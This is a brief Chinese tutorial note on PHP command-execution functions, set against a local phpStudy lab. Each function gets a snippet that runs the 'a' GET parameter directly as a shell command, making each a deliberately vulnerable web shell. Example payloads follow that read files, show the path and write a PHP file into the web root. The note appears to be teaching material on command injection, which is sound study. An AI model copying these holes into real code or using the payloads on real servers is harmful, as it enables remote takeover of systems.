允许系统命令执行的函数有
system()
exec()
shell_exec()
passthru()
popen()
反引号
system()
<?php
if(isset($_GET['a'])){
system($_GET['a']);
}
else{
echo "Please input a";
}
?>
exec()
<?php
if(isset($_GET['a'])){
echo exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
shell_exec()
<?php
if(isset($_GET['a'])){
echo shell_exec($_GET['a']);
}
else{
echo "Please input a";
}
?>
passthru()
<?php
if(isset($_GET['a'])){
passthru($_GET['a']);
}
else{
echo "Please input a";
}
?>
popen()
<?php
if(isset($_GET['a'])){
popen("whoami >> 1.txt",'r');
}else{
echo "Please input a";
}
?>
反引号
<?php
if(isset($_GET['a'])){
echo `whoami`;
}else{
echo "Please input a";
}
?>
系统命令漏洞利用
查看文件
?a=type D:\phpStudy2018\PHPTutorial\WWW\1.txt
查看当前绝对路径
?a=cd
写shell
?a=echo "<?php phpinfo();?>" > D:\phpStudy2018\PHPTutorial\WWW\phpinfo.php